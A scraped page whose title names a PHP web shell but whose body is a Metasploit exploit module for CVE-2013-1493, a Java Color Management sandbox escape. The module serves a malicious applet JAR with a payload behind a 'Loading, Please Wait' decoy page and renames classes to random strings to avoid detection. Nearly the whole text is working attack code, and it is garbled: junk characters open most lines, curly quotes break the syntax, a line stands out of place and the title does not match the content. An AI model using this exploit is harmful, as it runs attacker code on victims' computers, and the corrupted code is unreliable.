STUNSHELL PHP Web Shell远程执行代码

admin

##
- t; ]! \, X$ y
6 r' s/ x$ R/ H/ }7 D: U# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
6 ]6 w- Z  C6 _7 D+ {8 p" V- D1 L# http://metasploit.com/
; |' L( q7 F6 m" \4 }1 Z# c##
3 {  L6 d/ y4 F! g; Arequire ‘msf/core’
require ‘rex’
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
  _! F6 c; m1 c. Q4 K0 qinclude Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
! z' i# H% y+ [* Oinclude Msf::Exploit::Remote::BrowserAutopwn
6 }& i  \) ~3 N$ [  Jautopwn_info({ :javascript => false })
. l$ F% W- r$ q% w, adef initialize( info = {} )
7 ]4 d3 t( [0 U$ P+ Usuper( update_info( info,
‘Name’ => ‘Java CMM Remote Code Execution’,
) g; p" P; r- q* v( u4 H5 x3 c6 a‘Description’ => %q{
This module abuses the Color Management classes from a Java Applet to run
$ Q) X$ m3 A1 f1 parbitrary Java code outside of the sandbox as exploited in the wild in February
  U% V- _$ @1 N3 ?- j8 Cand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
9 W) P/ _5 n; b9 l- {- y6 iand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
/ n2 s% Q: }2 lsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
warning in order to run the malicious applet.
* z4 f# H! _: E2 z' P" l},
‘License’ => MSF_LICENSE,
; C% w$ V' n8 H3 E1 t‘Author’ =>
'Unknown', # Vulnerability discovery and Exploit
$ [7 d3 X* F  r0 a$ M! m'juan vazquez' # Metasploit module (just ported the published exploit)
& E9 H0 x% a7 j# L7 K$ e0 W7 z/ V],
+ G& L8 C( @# b: J+ j% d2 x# B‘References’ =>
0 ~$ M' a. F4 J2 ]+ B[
  T) l. j; a1 {. g; G/ \[ 'CVE', '2013-1493' ],
: |; {- s5 p7 k[ 'OSVDB', '90737' ],
[ 'BID', '58238' ],
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
[ 'URL', 'http://pastie.org/pastes/6581034' ]
],
‘Platform’ => [ 'win', 'java' ],
2 z  z  ]4 j+ ?' s0 }+ h. k" v‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
# D7 i# `9 J/ l, B  D5 Z5 v‘Targets’ =>
+ q. A9 i; l+ U% W4 i9 E0 W[
[ 'Generic (Java Payload)',
& r, n' j1 }' ?+ a% a8 K: y8 g- H{
& V1 s: @& E# S'Platform' => 'java',
. t9 G- u; f6 i& u$ ^# y. x1 K'Arch' => ARCH_JAVA
! T# R& b/ N9 Q+ w# o7 y}
],
[ 'Windows x86 (Native Payload)',
4 i8 M2 q. ]# r) _# Q0 N{
5 l$ d) V! o0 u$ P'Platform' => 'win',
'Arch' => ARCH_X86
: u2 W2 A& O% J; \}
]
],
1 x% N$ k5 o$ p& y# F2 k$ P! W* S‘‘DisclosureDate’ => ‘Mar 01 2013′
))
( a( f# ?5 T, M! Z/ ~7 |  Wend
def setup
9 {  r( q7 Q$ j( B" rpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
. I) P  v/ j3 H% ]" R3 s3 T) l@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
4 h/ S4 v) B. r4 S7 @3 c2 F6 Mpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
9 Y7 F* D" o; A! P* j@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
0 B( [( m1 n' V2 q8 Lpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
  f9 D2 H8 f8 X2 i) m+ b+ ~% C8 w" f@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
@init_class_name = rand_text_alpha(“Init”.length)
$ v8 }$ w( A5 L@init_class.gsub!(“Init”, @init_class_name)
super
end
def on_request_uri(cli, request)
print_status(“handling request for #{request.uri}”)
7 @7 `; G) S8 v5 o+ icase request.uri
4 l8 D0 L7 G& @8 b0 S) E% Dwhen /\.jar$/i
3 M3 U" q; X# ?! {! J. Ajar = payload.encoded_jar
) o* c3 ^0 a2 A5 C9 Ojar.add_file(“#{@init_class_name}.class”, @init_class)
jar.add_file(“Leak.class”, @leak_class)
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
! C, D1 q$ m5 M* P+ sjar.add_file(“MyColorSpace.class”, @color_space_class)
DefaultTarget’ => 1,
metasploit_str = rand_text_alpha(“metasploit”.length)
payload_str = rand_text_alpha(“payload”.length)
, F3 N( X' i* \7 a% ^1 ^; jjar.entries.each { |entry|
entry.name.gsub!(“metasploit”, metasploit_str)
entry.name.gsub!(“Payload”, payload_str)
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
entry.data = entry.data.gsub(“Payload”, payload_str)
}
jar.build_manifest
8 ]% y1 p; r; A2 U# w9 r4 bsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
when /\/$/
" s% P6 O' ?- Jpayload = regenerate_payload(cli)
if not payload
print_error(“Failed to generate the payload.”)
: {8 A6 A: G/ t" Usend_not_found(cli)
return
end
8 U) Q% n" j* v) P+ l9 Esend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
' ]+ X  |3 D; ]% K- @9 belse
send_redirect(cli, get_resource() + ‘/’, ”)
- ~/ V% ~+ g6 y' dend
end
def generate_html
8 W$ S8 A. p* v/ p& _  Khtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
7 B! u3 ]0 n. p- Q9 xhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
) |( M2 T. q/ V/ Q+ Yhtml += %Q|</applet></body></html>|
return html
end
end
# R* b* }" m1 @8 e: |$ g$ t6 Kend
4 N5 T5 p& Z& }9 C3 i